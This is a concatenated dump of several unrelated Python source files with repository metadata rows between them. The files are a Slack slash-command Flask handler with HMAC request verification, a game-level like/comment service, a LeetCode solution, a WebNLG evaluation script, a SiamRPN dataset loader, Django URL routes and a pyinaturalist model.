flask.request.headers['X-Slack-Request-Timestamp'],
raw_data.decode('utf-8'),
):
return flask.Response(status=400)
text = flask.request.form['text']
if len(text) == 0:
return flask.jsonify({
"response_type": "ephemeral",
# We re-use the docstring in this function as the help text.
"text": "I need a subcommand!\n```{}```".format(textwrap.dedent(slack_slash_commands.__doc__))
})
# Request payload mangling and subcommand delegation occurs.
parts = text.split(' ')
command = parts[0]
args = parts[1:]
if command == 'watch':
if len(args) != 3:
return flask.jsonify({
"response_type": "ephemeral",
"text": "Please use a format like `tuolumne DD/MM/YY <length>`."
})
campground, start, length = args
try:
date = arrow.get(start, 'DD/MM/YY')
        except Exception:
return flask.jsonify({
"response_type": "ephemeral",
"text": "Could not parse your date, please use a DD/MM/YY format.",
})
# Hackish workaround: 01/01/2019 successfully parses via DD/MM/YY above,
        # but will subsequently get interpreted as e.g. "2020" - ignoring the
# latter two characters.
if date.format('DD/MM/YY') != start:
return flask.jsonify({
"response_type": "ephemeral",
"text": "Could not parse your date, please use a DD/MM/YY format.",
})
user_id = flask.request.form['user_id']
return add_watcher(user_id, campground, start, int(length))
elif command == 'list':
return slack_list_watchers(flask.request.form['user_id'])
elif command == 'list-all':
return slack_list_watchers()
elif command == 'campgrounds':
return slack_list_campgrounds(args)
elif command == 'help':
return flask.jsonify({
"response_type": "ephemeral",
"text": "```{}```".format(textwrap.dedent(slack_slash_commands.__doc__))
})
else:
return flask.jsonify({
"response_type": "ephemeral",
"text": "I haven't been implemented yet!",
})
def make_watcher_attachments(watchers):
"""
Returns a json-encodable representation of attachments representing active watchers.
"""
results = []
for watcher in watchers:
watch_results = watcher.get('results')
if watch_results:
text = "<@{}> found sites in *{}* from {} for {} day(s).".format(
watcher['user_id'],
watcher['campground'],
watcher['start'],
watcher['length'],
)
color = "#36a64f"
else:
text = "<@{}> is looking in *{}* from {} for {} day(s).".format(
watcher['user_id'],
watcher['campground'],
watcher['start'],
watcher['length'],
)
color = "#ccbd22"
attachment = {
"fallback": "Required plain-text summary of the attachment.",
"color": color,
"text": text,
"mrkdwn_in": ["text", "pretext"],
"callback_id": "watcher_manage",
"actions": [
{
"name": "cancel",
"text": "Remove",
"style": "danger",
"type": "button",
"value": watcher['id'],
"confirm": {
"title": "Are you sure?",
"text": "This will cancel scraping for this reservation.",
"ok_text": "Yes",
"dismiss_text": "No"
},
},
]
}
if watcher.get('silenced'):
attachment['actions'].insert(0, {
"name": "unsilence",
"text": "Unsilence",
"type": "button",
"value": watcher['id'],
})
else:
attachment['actions'].insert(0, {
"name": "silence",
"text": "Silence",
"type": "button",
"value": watcher['id'],
})
if watch_results:
attachment['actions'].insert(0, {
"name": "results",
"text": "Show Results",
"type": "button",
"style": "primary",
"value": watcher['id'],
})
results.append(attachment)
return results
def make_results_attachments(results):
"""
Returns a json-encodable representation of attachments representing found campsites.
"""
return [{
"fallback": "Campsite result.",
"color": "#36a64f",
"mrkdwn_in": ["text"],
"title": "Found a {} on {} at {} site {} for {:.0%} of requested stay.".format(
':unicorn_face:' if result['fraction'] == 1 else 'site',
result['date'],
result['campground']['short_name'],
result['campsite']['site'],
result['fraction'],
),
"title_link": result['url'],
} for result in results]
# Thanks Jani Karhunen: https://janikarhunen.fi/verify-slack-requests-in-aws-lambda-and-python.html
def verify_slack_request(slack_signature=None, slack_request_timestamp=None, request_body=None):
''' Form the basestring as stated in the Slack API docs. We need to make a bytestring. '''
basestring = f"v0:{slack_request_timestamp}:{request_body}".encode('utf-8')
''' Make the Signing Secret a bytestring too. '''
slack_signing_secret = bytes(SLACK_SIGNING_SECRET, 'utf-8')
''' Create a new HMAC "signature", and return the string presentation. '''
my_signature = 'v0=' + hmac.new(slack_signing_secret, basestring, hashlib.sha256).hexdigest()
    ''' Compare the Slack-provided signature to ours.
If they are equal, the request should be verified successfully.
Log the unsuccessful requests for further analysis
(along with another relevant info about the request). '''
if hmac.compare_digest(my_signature, slack_signature):
return True
else:
LOGGER.warning(f"Verification failed. my_signature: {my_signature} basestring: {basestring}")
return False
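# Illustrative round-trip of the check above (not part of the app; the body,
# timestamp and command values are made up). Slack signs the basestring
# "v0:<timestamp>:<raw body>" with the app's signing secret, so a request we
# sign ourselves must verify:
#
#     body = 'token=abc&command=%2Fcrush&text=list'
#     ts = '1531420618'
#     sig = 'v0=' + hmac.new(
#         bytes(SLACK_SIGNING_SECRET, 'utf-8'),
#         f"v0:{ts}:{body}".encode('utf-8'),
#         hashlib.sha256,
#     ).hexdigest()
#     assert verify_slack_request(sig, ts, body)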
| UTF-8 | Python | false | false | 20,161 | py | 27 | app.py | 5 | 0.540697 | 0.531224 | 0 | 661 | 29.500756 | 106 |
ashkan18/like-api | 481,036,372,826 | fd1018993b41db600da666ac3a35c485dcfe45b3 | f7a088759f35a08e492ea66f625bda2426163a76 | /services/level_service.py | caea6c2a5a758dd599555e682150e891bc9341d8 | []
| no_license | https://github.com/ashkan18/like-api | dc82587e57145e16b28884a773eae3b8ac24c73f | f2c4074d05fb8e5766463dc50736e1fe71a40637 | refs/heads/master | 2016-08-03T14:19:15.399546 | 2014-05-12T22:23:29 | 2014-05-12T22:23:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from models.comment_model import CommentModel
from models.level_model import LevelModel
from models.user_model import UserModel
from services import user_service
__author__ = 'root'
def get_level_stats(level_id):
"""
This method will get the total number of likes for specific level
@param level_id: integer id of the level we are looking for
@return: count of number of likes and comments each level has had
"""
level = LevelModel.query(LevelModel.level_id == level_id).get()
if level is None:
return 0
else:
return level.likes_count, level.comments_count
def comment_on_level(level_id, user_id, comment_text):
"""
This method will add a comment to a level and also list of users comments
@param level_id: integer id of the level we are adding this comment
@param user_id: ineteger id of the user who is adding this comment
@param comment_text: the text of the comment
"""
level = get_level_by_id(level_id)
user = user_service.get_user_by_id(user_id)
comment = CommentModel(user_id=user_id, level_id=level_id, text=comment_text)
level.comments.append(comment)
user.comments.append(comment)
level.put()
user.put()
def like_level(level_id, user_id):
"""
This method will add a like to a level by a user
@param level_id: integer id of the level we are adding the like
@param user_id: integer id of the user who liked the level
"""
level = get_level_by_id(level_id)
    user = user_service.get_user_by_id(user_id)
user.likes.append(level_id)
level.likes.append(user_id)
level.put()
    user.put()
def get_level_by_id(level_id):
"""
This method will get a level model by level id, if we don't have this level, it will create one
@param level_id: id of the level we are looking for
@return: levelModel of the model we are looking for
"""
level = LevelModel.query(LevelModel.level_id == level_id).get()
# if we haven't had this level before, add it
if level is None:
level = LevelModel(level_id=level_id)
return level
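# Illustrative usage of the service functions above (hypothetical ids,
# not part of this module):
#
#     likes, comments = get_level_stats(42)
#     comment_on_level(42, user_id=7, comment_text='nice level')
#     like_level(42, user_id=7)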
| UTF-8 | Python | false | false | 2,095 | py | 10 | level_service.py | 9 | 0.6821 | 0.681623 | 0 | 62 | 32.790323 | 99 |
wyaadarsh/LeetCode-Solutions | 6,777,458,441,493 | c4cd383f6875abd08cd613d65b6fe9735cce945a | fcc88521f63a3c22c81a9242ae3b203f2ea888fd | /Python3/1258-Synonymous-Sentences/soln.py | 8f3b59d4ac4a188bd1e24f702beec4862215187d | [
"MIT"
]
| permissive | https://github.com/wyaadarsh/LeetCode-Solutions | b5963e3427aa547d485d3a2cb24e6cedc72804fd | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | refs/heads/master | 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 | MIT | true | 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | 2020-08-30T15:49:37 | 2020-08-30T15:49:34 | 7,769 | 0 | 0 | 0 | null | false | false | import itertools
from typing import List
class Solution:
def generateSentences(self, synonyms: List[List[str]], text: str) -> List[str]:
sets = []
words = set()
for u, v in synonyms:
if u not in words and v not in words:
sets.append({u, v})
else:
for s in sets:
if u in s or v in s:
s.add(u)
s.add(v)
words.add(u)
words.add(v)
tokens = text.split()
cands = []
for i, token in enumerate(tokens):
if token in words:
for s in sets:
if token in s:
cands.append(s)
break
template = " ".join(token if token not in words else "{}" for token in tokens)
ans = []
for word_comb in itertools.product(*cands):
ans.append(template.format(*word_comb))
return sorted(ans)
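# Illustrative example (made up, mirroring the LeetCode 1258 setup):
#   synonyms = [["happy", "joy"], ["sad", "sorrow"]]
#   text = "I am happy but was sad"
# yields, in sorted order:
#   ["I am happy but was sad", "I am happy but was sorrow",
#    "I am joy but was sad", "I am joy but was sorrow"]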
| UTF-8 | Python | false | false | 956 | py | 3,904 | soln.py | 3,904 | 0.443515 | 0.443515 | 0 | 27 | 34.407407 | 86 |
XinnuoXu/AggGen | 15,891,379,024,134 | af13616d9e89ec60b6fcdfda49ccc2563613b08c | f599d89129aee1ca1e5c9e845c2643c2242a4caa | /data_webnlg/evaluation_annotation.py | 0e1ea7a9024aaa4a23f2e06bdc9874c033c69db8 | []
| no_license | https://github.com/XinnuoXu/AggGen | f6b034e95b24859f6bd4d6c5594edf64af5ee215 | df05a9d1ab99d48c9a7ff8f73d6645a2c7596d64 | refs/heads/master | 2023-05-14T05:07:01.509324 | 2021-05-31T07:32:57 | 2021-05-31T07:32:57 | 294,522,221 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #coding=utf8
import os, sys
from sklearn.metrics.cluster import normalized_mutual_info_score
from scipy.stats import kendalltau
from scipy.stats import spearmanr
GT_PATH = './data-rst/webnlg_ann_gt_plan.jsonl'
SRC_PATH = './data-rst/webnlg_ann_src.jsonl'
ANN_PATH = './data-alg/webnlg_ann_tgt.jsonl'
class Precision(object):
def load_cand(self):
cands = []
for line in open(ANN_PATH):
flist = line.strip().split('\t')
sequence = flist[1].split('|')
ann_res = {}
for i, slot in enumerate(sequence):
types = slot.split('&')
for t in types:
ann_res[t] = i
cands.append(ann_res)
return cands
def load_gold(self):
golds = []
for line in open(GT_PATH):
sequence = line.strip().split('|')
ann_res = {}
for i, slot in enumerate(sequence):
types = slot.split('&')
for t in types:
ann_res[t] = i
golds.append(ann_res)
return golds
def load_src(self):
srcs = []
for line in open(SRC_PATH):
srcs.append(line.strip().split('\t')[-1].split('|'))
return srcs
def get_acc(self, cands, golds, srcs):
acc = 0; num = 0
for i, src in enumerate(srcs):
gold = golds[i]
cand = cands[i]
cand_ann = [cand[s] for s in src]
gold_ann = [gold[s] for s in src]
for j in range(len(cand_ann)):
if cand_ann[j] == gold_ann[j]:
acc += 1
num += 1
return acc/num
def run(self):
cands = self.load_cand()
golds = self.load_gold()
srcs = self.load_src()
acc = self.get_acc(cands, golds, srcs)
print ('acc:', acc)
if __name__ == '__main__':
    acc_obj = Precision()
acc_obj.run()
| UTF-8 | Python | false | false | 1,945 | py | 175 | evaluation_annotation.py | 88 | 0.497172 | 0.493573 | 0 | 67 | 28.029851 | 64 |
CSI-BennettUniversity/Sample-Project-1 | 6,914,897,378,682 | 28a5014fea8d35301e2e0d5ef80841b0fad4fae2 | 25ad0b1a056c6fb988fa8c8718bb7cd55388ee5f | /interactions/functions/questions.py | 8eb6f911499398574032e1e9d5484be19fc91f95 | [
"MIT"
]
| permissive | https://github.com/CSI-BennettUniversity/Sample-Project-1 | eeab14a36eeae8d65cdd85efaf54c85732985dcf | 23197352372b7ad00a026683477b5a95a4178e35 | refs/heads/master | 2023-05-13T17:25:26.652317 | 2021-06-05T14:53:15 | 2021-06-05T14:53:15 | 374,136,065 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import random
from os import path
def return_questions(model: str) -> list:
""" This loads the questions from ``interactions/static/data/*.json`` as
per requirement and raises an ``Exception`` if the requested question
is not among the ones available. """
if model == 'SelfAnswerGroup':
file = 'self_questions'
elif model == 'RelationAnswerGroup':
file = 'relation_questions'
else:
raise Exception(
(f"Invalid model ({model}) used."
" Only SelfAnswerGroup and RelationAnswerGroup allowed.")
)
file_path = path.dirname(path.dirname(__file__))
with open(path.join(file_path, 'static', 'data', f"{file}.json")) as f:
json_data = json.load(f)
random.shuffle(json_data)
return json_data
| UTF-8 | Python | false | false | 810 | py | 130 | questions.py | 74 | 0.630864 | 0.630864 | 0 | 24 | 32.75 | 76 |
zhu2014yi/CRPN | 14,422,500,191,338 | cfed43e15e8c7224d446cd7bba36c7d0d6b13591 | 196b1bb1a3d6b4bc85bc72c055a6c6acb2fc3269 | /lib/dataset/siamrpn.py | 1e029654d13250f61e54de40be113a2a79f253ba | [
"MIT"
]
| permissive | https://github.com/zhu2014yi/CRPN | 9dd1b016af54c41de98fc080185453fb98e189e0 | 5da5bf42eb8c86a17bdff52680c3827a2ef18590 | refs/heads/master | 2023-03-07T21:50:22.931776 | 2021-02-17T04:09:44 | 2021-02-17T04:09:44 | 262,253,242 | 15 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Zhipeng Zhang (zhangzhipeng2017@ia.ac.cn)
# Details: siamrpn dataset generator
# Reference: SiamRPN [Li]
# ------------------------------------------------------------------------------
from __future__ import division
import os
import cv2
import json
import math
import random
import numpy as np
import torchvision.transforms as transforms
from os.path import join
from torch.utils.data import Dataset
from easydict import EasyDict as edict
from scipy.ndimage.filters import gaussian_filter
import sys
sys.path.append('../')
from utils.utils import *
from core.config import config
from .module import SingleData
sample_random = random.Random()
#sample_random.seed(123456)
eps = 1e-7
class SiamRPNDataset(Dataset):
def __init__(self, cfg):
super(SiamRPNDataset, self).__init__()
# pair information
self.template_size = cfg.SIAMRPN.TRAIN.TEMPLATE_SIZE
self.search_size = cfg.SIAMRPN.TRAIN.SEARCH_SIZE
self.score_size = (self.search_size - self.template_size) // cfg.SIAMRPN.TRAIN.STRIDE + 1 # from cross-correlation
# anchors information
self.thr_high = cfg.SIAMRPN.TRAIN.ANCHORS_THR_HIGH
self.thr_low = cfg.SIAMRPN.TRAIN.ANCHORS_THR_LOW
self.pos_keep = cfg.SIAMRPN.TRAIN.ANCHORS_POS_KEEP # kept positive anchors to calc loss
self.all_keep = cfg.SIAMRPN.TRAIN.ANCHORS_ALL_KEEP # kept anchors to calc loss
self.stride = cfg.SIAMRPN.TRAIN.STRIDE
self.anchor_nums = len(cfg.SIAMRPN.TRAIN.ANCHORS_RATIOS) * len(config.SIAMRPN.TRAIN.ANCHORS_SCALES)
self._naive_anchors(cfg) # return self.anchors_naive [anchor_num, 4]
self._pair_anchors(center=self.search_size//2, score_size=self.score_size)
# aug information
self.color = cfg.SIAMRPN.DATASET.COLOR
self.flip = cfg.SIAMRPN.DATASET.FLIP
self.rotation = cfg.SIAMRPN.DATASET.ROTATION
self.blur = cfg.SIAMRPN.DATASET.BLUR
self.shift_template = cfg.SIAMRPN.DATASET.TEMPLATE_SHIFT
self.shift_search = cfg.SIAMRPN.DATASET.SEARCH_SHIFT
self.scale_template = cfg.SIAMRPN.DATASET.TEMPLATE_SCALE
self.scale_search = cfg.SIAMRPN.DATASET.SEARCH_SCALE
self.transform_extra = transforms.Compose(
[transforms.ToPILImage(), ] +
([transforms.ColorJitter(0.05, 0.05, 0.05, 0.05), ] if self.color > random.random() else [])
+ ([transforms.RandomHorizontalFlip(), ] if self.flip > random.random() else [])
+ ([transforms.RandomRotation(degrees=10), ] if self.rotation > random.random() else [])
)
# train data information
print('train datas: {}'.format(cfg.SIAMRPN.TRAIN.WHICH_USE))
self.train_datas = [] # all train dataset
start = 0
self.num = 0
for data_name in cfg.SIAMRPN.TRAIN.WHICH_USE:
dataset = SingleData(cfg, data_name, start)
self.train_datas.append(dataset)
start += dataset.num # real video number
self.num += dataset.num_use # the number used for subset shuffle
# assert abs(self.num - cfg.SIAMRPN.TRAIN.PAIRS) < eps, 'given pairs is not equal to sum of all dataset'
self._shuffle()
print(cfg)
def __len__(self):
return self.num
def __getitem__(self, index):
# choose a dataset
index = self.pick[index]
dataset, index = self._choose_dataset(index)
#neg = config.DATASET.NEG and config.DATASET.NEG > np.random.random()
neg=0
if neg:
template = dataset.get_random_target(index)
            search = np.random.choice(self.train_datas).get_random_target()
else:
template, search = dataset._get_pairs(index)
# read images
template_image = cv2.imread(template[0])
search_image = cv2.imread(search[0])
# transform original bbox to cropped image
template_box = self._toBBox(template_image, template[1])
search_box = self._toBBox(search_image, search[1])
template, _, _ = self._augmentation_template(template_image, template_box, self.template_size)
search, bbox, dag_param = self._augmentation_search(search_image, search_box, self.search_size)
# from PIL image to numpy
template = np.array(template)
search = np.array(search)
# get label for regression
cls, delta, delta_weight= self._anchor_target(bbox, pos_keep=self.pos_keep, all_keep=self.all_keep,
thr_high=self.thr_high, thr_low=self.thr_low)
sum_weight = self._dynamic_label([self.score_size, self.score_size], dag_param['shift'], 'balanced')
template, search = map(lambda x: np.transpose(x, (2, 0, 1)).astype(np.float32), [template, search])
return template, search, cls,delta, delta_weight, sum_weight, np.array(bbox, np.float64)
# ------------------------------------
# function groups for selecting pairs
# ------------------------------------
def _python2round(self, f):
"""
        Use Python 2 rounding (half away from zero) in Python 3.
"""
if round(f + 1) - round(f) != 1:
return f + abs(f) / f * 0.5
return round(f)
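    # Illustrative difference this helper papers over (Python 3 rounds
    # half-to-even, Python 2 rounded half away from zero):
    #   round(2.5)               -> 2 in Python 3
    #   self._python2round(2.5)  -> 3.0
    #   self._python2round(-2.5) -> -3.0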
def _shuffle(self):
"""
        Randomly shuffle the pick indices across all sub-datasets.
"""
pick = []
m = 0
while m < self.num:
p = []
for subset in self.train_datas:
sub_p = subset.pick
p += sub_p
sample_random.shuffle(p)
pick += p
m = len(pick)
self.pick = pick
print("dataset length {}".format(self.num))
def _choose_dataset(self, index):
for dataset in self.train_datas:
if dataset.start + dataset.num > index:
return dataset, index - dataset.start
def _toBBox(self, image, shape):
imh, imw = image.shape[:2]
if len(shape) == 4:
w, h = shape[2] - shape[0], shape[3] - shape[1]
else:
w, h = shape
context_amount = 0.5
exemplar_size = self.template_size
wc_z = w + context_amount * (w + h)
hc_z = h + context_amount * (w + h)
s_z = np.sqrt(wc_z * hc_z)
scale_z = exemplar_size / s_z
w = w * scale_z
h = h * scale_z
cx, cy = imw // 2, imh // 2
bbox = center2corner(Center(cx, cy, w, h))
return bbox
def _crop_hwc(self, image, bbox, out_sz, padding=(0, 0, 0)):
"""
crop image
"""
bbox = [float(x) for x in bbox]
a = (out_sz - 1) / (bbox[2] - bbox[0])
b = (out_sz - 1) / (bbox[3] - bbox[1])
c = -a * bbox[0]
d = -b * bbox[1]
mapping = np.array([[a, 0, c],
[0, b, d]]).astype(np.float)
crop = cv2.warpAffine(image, mapping, (out_sz, out_sz), borderMode=cv2.BORDER_CONSTANT, borderValue=padding)
return crop
def _posNegRandom(self):
"""
random number from [-1, 1]
"""
return random.random() * 2 - 1.0
# ------------------------------------
# function for data augmentation
# ------------------------------------
def _augmentation_template(self, image, bbox, size):
"""
        Data augmentation (shift/scale/blur) for the template crop; color augmentation is already applied via transform_extra.
"""
shape = image.shape
crop_bbox = center2corner((shape[0] // 2, shape[1] // 2, size, size))
param = edict()
param.shift = (self._posNegRandom() * self.shift_template, self._posNegRandom() * self.shift_template) # shift
param.scale = ((1.0 + self._posNegRandom() * self.scale_template), (1.0 + self._posNegRandom() * self.scale_template)) # scale change
crop_bbox, _ = aug_apply(Corner(*crop_bbox), param, shape)
x1, y1 = crop_bbox.x1, crop_bbox.y1
bbox = BBox(bbox.x1 - x1, bbox.y1 - y1, bbox.x2 - x1, bbox.y2 - y1)
scale_x, scale_y = param.scale
bbox = Corner(bbox.x1 / scale_x, bbox.y1 / scale_y, bbox.x2 / scale_x, bbox.y2 / scale_y)
image = self._crop_hwc(image, crop_bbox, size) # shift and scale
if self.blur > random.random():
image = gaussian_filter(image, sigma=(1, 1, 0))
image = self.transform_extra(image) # other data augmentation
return image, bbox, param
def _augmentation_search(self, image, bbox, size):
"""
        Data augmentation (shift/scale/blur) for the search crop; color augmentation is already applied via transform_extra.
"""
shape = image.shape
crop_bbox = center2corner((shape[0] // 2, shape[1] // 2, size, size))
param = edict()
param.shift = (self._posNegRandom() * self.shift_search, self._posNegRandom() * self.shift_search) # shift
param.scale = ((1.0 + self._posNegRandom() * self.scale_search), (1.0 + self._posNegRandom() * self.scale_search)) # scale change
crop_bbox, _ = aug_apply(Corner(*crop_bbox), param, shape)
x1, y1 = crop_bbox.x1, crop_bbox.y1
bbox = BBox(bbox.x1 - x1, bbox.y1 - y1, bbox.x2 - x1, bbox.y2 - y1)
scale_x, scale_y = param.scale
bbox = Corner(bbox.x1 / scale_x, bbox.y1 / scale_y, bbox.x2 / scale_x, bbox.y2 / scale_y)
image = self._crop_hwc(image, crop_bbox, size) # shift and scale
if self.blur > random.random():
image = gaussian_filter(image, sigma=(1, 1, 0))
image = self.transform_extra(image) # other data augmentation
return image, bbox, param
# ------------------------------------
# function for anchors and labels
# ------------------------------------
def _pair_anchors(self, center, score_size):
"""
anchors corresponding to pairs
:param center: center of search image
:param score_size: output score size after cross-correlation
:return: anchors not corresponding to ground truth
"""
a0x = center - score_size // 2 * self.stride
ori = np.array([a0x] * 4, dtype=np.float32)
zero_anchors = self.anchors_naive + ori
x1 = zero_anchors[:, 0]
y1 = zero_anchors[:, 1]
x2 = zero_anchors[:, 2]
y2 = zero_anchors[:, 3]
x1, y1, x2, y2 = map(lambda x: x.reshape(self.anchor_nums, 1, 1), [x1, y1, x2, y2])
cx, cy, w, h = corner2center([x1, y1, x2, y2])
disp_x = np.arange(0, score_size).reshape(1, 1, -1) * self.stride
disp_y = np.arange(0, score_size).reshape(1, -1, 1) * self.stride
cx = cx + disp_x
cy = cy + disp_y
zero = np.zeros((self.anchor_nums, score_size, score_size), dtype=np.float32)
cx, cy, w, h = map(lambda x: x + zero, [cx, cy, w, h])
x1, y1, x2, y2 = center2corner([cx, cy, w, h])
self.anchorsPairs = np.stack([x1, y1, x2, y2]), np.stack([cx, cy, w, h])
def _naive_anchors(self, cfg):
"""
anchors corresponding to score map
"""
self.anchors_naive = np.zeros((self.anchor_nums, 4), dtype=np.float32)
size = self.stride * self.stride
count = 0
for r in cfg.SIAMRPN.TRAIN.ANCHORS_RATIOS:
ws = int(math.sqrt(size*1. / r))
hs = int(ws * r)
for s in cfg.SIAMRPN.TRAIN.ANCHORS_SCALES:
w = ws * s
h = hs * s
self.anchors_naive[count][:] = [-w*0.5, -h*0.5, w*0.5, h*0.5][:]
count += 1
def _anchor_target(self, target, pos_keep=16, all_keep=64, thr_high=0.6, thr_low=0.3,neg=False):
cls = np.zeros((self.anchor_nums, self.score_size, self.score_size), dtype=np.int64)
cls[...] = -1 # -1 ignore 0 negative 1 positive
delta = np.zeros((4, self.anchor_nums, self.score_size, self.score_size), dtype=np.float32)
delta_weight = np.zeros((self.anchor_nums, self.score_size, self.score_size), dtype=np.float32)
tcx, tcy, tw, th = corner2center(target)
anchor_box = self.anchorsPairs[0]
anchor_center = self.anchorsPairs[1]
x1, y1, x2, y2 = anchor_box[0], anchor_box[1], anchor_box[2], anchor_box[3]
cx, cy, w, h = anchor_center[0], anchor_center[1], anchor_center[2], anchor_center[3]
# delta
delta[0] = (tcx - cx) / w
delta[1] = (tcy - cy) / h
delta[2] = np.log(tw / (w + eps) + eps)
delta[3] = np.log(th / (h + eps) + eps)
# IoU
overlap = IoU([x1, y1, x2, y2], target)
pos = np.where(overlap > thr_high)
neg = np.where(overlap < thr_low)
pos, pos_num = self._select(pos, pos_keep)
neg, neg_num = self._select(neg, all_keep - pos_num)
cls[pos] = 1
w_temp = 1. / (pos_num + 1e-6) # fix bugs here
delta_weight[pos] = w_temp
cls[neg] = 0
return cls, delta, delta_weight
# def _anchor_target(self,target, pos_keep=16, all_keep=64, thr_high=0.6, thr_low=0.3):
# label_cls = np.zeros((self.anchor_nums, self.score_size, self.score_size), dtype=np.int64)
# label_cls[...] = -1 # -1 ignore 0 negative 1 positive
# label_cls_next = np.ones_like(label_cls) * (-1)
# delta = np.zeros((4, self.anchor_nums, self.score_size, self.score_size), dtype=np.float32)
# delta_weight = np.zeros((self.anchor_nums, self.score_size, self.score_size), dtype=np.float32)
#
# tcx, tcy, tw, th = corner2center(target)
#
#
# anchor_box = self.anchorsPairs[0]
# anchor_center = self.anchorsPairs[1]
# x1, y1, x2, y2 = anchor_box[0], anchor_box[1], anchor_box[2], anchor_box[3]
# cx, cy, w, h = anchor_center[0], anchor_center[1], anchor_center[2], anchor_center[3]
#
#
# # delta
# delta[0] = (tcx - cx) / w
# delta[1] = (tcy - cy) / h
# delta[2] = np.log(tw / (w + eps) + eps)
# delta[3] = np.log(th / (h + eps) + eps)
#
# # IoU
# overlap = IoU([x1, y1, x2, y2], target)
# pos = np.where(overlap > thr_high)
# neg = np.where(overlap < thr_low)
#
# #label
# label_cls[pos] = 1
# label_cls[neg] = 0
# pos_c, pos_num = self._select(pos, pos_keep)
# neg_c, neg_num = self._select(neg, all_keep - pos_num)
#
# label_cls_next[pos_c] = 1
# w_temp = 1. / (pos_num + 1e-6) # fix bugs here
# delta_weight[pos_c] = w_temp
#
# label_cls_next[neg_c] = 0
#
# return label_cls, delta, delta_weight,label_cls_next
def _select(self, position, keep_num=16):
"""
select pos and neg anchors to balance loss
"""
num = position[0].shape[0]
if num <= keep_num:
return position, num
slt = np.arange(num)
np.random.shuffle(slt)
slt = slt[:keep_num]
return tuple(p[slt] for p in position), keep_num
def _dynamic_label(self, fixedLabelSize, c_shift, labelWeight='balanced', rPos=2, rNeg=0):
if isinstance(fixedLabelSize, int):
fixedLabelSize = [fixedLabelSize, fixedLabelSize]
assert (fixedLabelSize[0] % 2 == 1)
if labelWeight == 'balanced':
d_label = self._create_dynamic_logisticloss_label(fixedLabelSize, c_shift, rPos, rNeg)
else:
logger.error('TODO or unknown')
return d_label
def _create_dynamic_logisticloss_label(self, label_size, c_shift, rPos=2, rNeg=0):
if isinstance(label_size, int):
sz = label_size
else:
sz = label_size[0]
# the real shift is -param['shifts']
sz_x = sz // 2 + round(-c_shift[0]) // 8 # 8 is strides
sz_y = sz // 2 + round(-c_shift[1]) // 8
x, y = np.meshgrid(np.arange(0, sz) - np.floor(float(sz_x)),
np.arange(0, sz) - np.floor(float(sz_y)))
dist_to_center = np.abs(x) + np.abs(y) # Block metric
label = np.where(dist_to_center <= rPos,
np.ones_like(y),
np.where(dist_to_center < rNeg,
0.5 * np.ones_like(y),
np.zeros_like(y)))
return label
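    # Illustrative output of _create_dynamic_logisticloss_label for sz=5,
    # c_shift=(0, 0) and rPos=2; the block (L1) metric makes the positive
    # region a diamond around the (possibly shifted) centre:
    #   0 0 1 0 0
    #   0 1 1 1 0
    #   1 1 1 1 1
    #   0 1 1 1 0
    #   0 0 1 0 0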
| UTF-8 | Python | false | false | 16,349 | py | 198 | siamrpn.py | 27 | 0.551844 | 0.532085 | 0 | 437 | 36.398169 | 142 |
navill/2-1_Project_repo | 17,265,768,546,824 | 7b3c0dd77b16898f8cc3274f14c5d0c40cc5673c | 280f650e91c675f471121b8a4a13c2bb5a0a5e6c | /apps/config/urls.py | 376ae4c5e9a9968770ab098b6787cd368433759f | []
| no_license | https://github.com/navill/2-1_Project_repo | a8e089c657e44034152df30a85220675f2c31084 | 3f62bca9f52799d9f877f2d01259bb51038c0cc4 | refs/heads/master | 2022-12-31T18:32:45.471261 | 2020-10-26T10:54:39 | 2020-10-26T10:54:39 | 303,907,042 | 0 | 0 | null | false | 2020-10-26T10:54:40 | 2020-10-14T04:57:03 | 2020-10-19T13:47:14 | 2020-10-26T10:54:39 | 44 | 0 | 0 | 1 | Python | false | false | from django.contrib import admin
from django.urls import path, include
from accounts.views.staff_view import list_staff_user
from accounts.views.views import create_normal_user, list_normal_user, login_view, logout_view
urlpatterns = [
path('admin/', admin.site.urls, name='admin'),
path('create/', create_normal_user, name='create_user'),
path('login/', login_view, name='login'),
path('logout/', logout_view, name='logout'),
path('normal/', list_normal_user, name='list_normal'),
path('staff/', list_staff_user, name='list_staff'),
path('accounts/', include('accounts.urls', namespace='accounts')),
path('accounts-api/', include('accounts.api.urls', namespace='accounts_api')),
]
| UTF-8 | Python | false | false | 717 | py | 21 | urls.py | 18 | 0.694561 | 0.694561 | 0 | 17 | 41.176471 | 94 |
N-e1/pyinaturalist | 8,581,344,701,238 | 64798a9aa5574c8095e60b6db83c9ba08ebf0154 | 450cc0c4c36cdc2bf18b93bd0d03e864b43ef7c9 | /pyinaturalist/models/observation_field.py | 33a0449eb5341f6a5cf57ca693584c679cabdd5f | [
"MIT"
]
| permissive | https://github.com/N-e1/pyinaturalist | 2ed8f0ae7760c7f4e9eeacff738e680bdaba3183 | 3bcbc5187514733947e6385108fdcb5dafc2a4f8 | refs/heads/main | 2023-04-25T18:31:11.884578 | 2021-06-08T23:52:39 | 2021-06-08T23:52:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from datetime import date, datetime
from typing import List, Union
from attr import field
from pyinaturalist.models import (
BaseModel,
LazyProperty,
Taxon,
User,
datetime_now_attr,
define_model,
kwarg,
)
from pyinaturalist.response_format import safe_split, try_int_or_float
# Mappings from observation field value datatypes to python datatypes
OFV_DATATYPES = {
'dna': str,
'date': date,
'datetime': datetime,
'numeric': try_int_or_float,
'taxon': int,
'text': str,
'time': str,
}
OFVValue = Union[date, datetime, float, int, str]
@define_model
class ObservationField(BaseModel):
"""A dataclass containing information about an observation field **definition**, matching the schema of
`GET /observation_fields <https://www.inaturalist.org/pages/api+reference#get-observation_fields>`_.
"""
allowed_values: List[str] = field(converter=safe_split, factory=list)
created_at: datetime = datetime_now_attr
datatype: str = kwarg # Enum
description: str = kwarg
id: int = kwarg
name: str = kwarg
updated_at: datetime = datetime_now_attr
user_id: int = kwarg
users_count: int = kwarg
uuid: str = kwarg
values_count: int = kwarg
@define_model
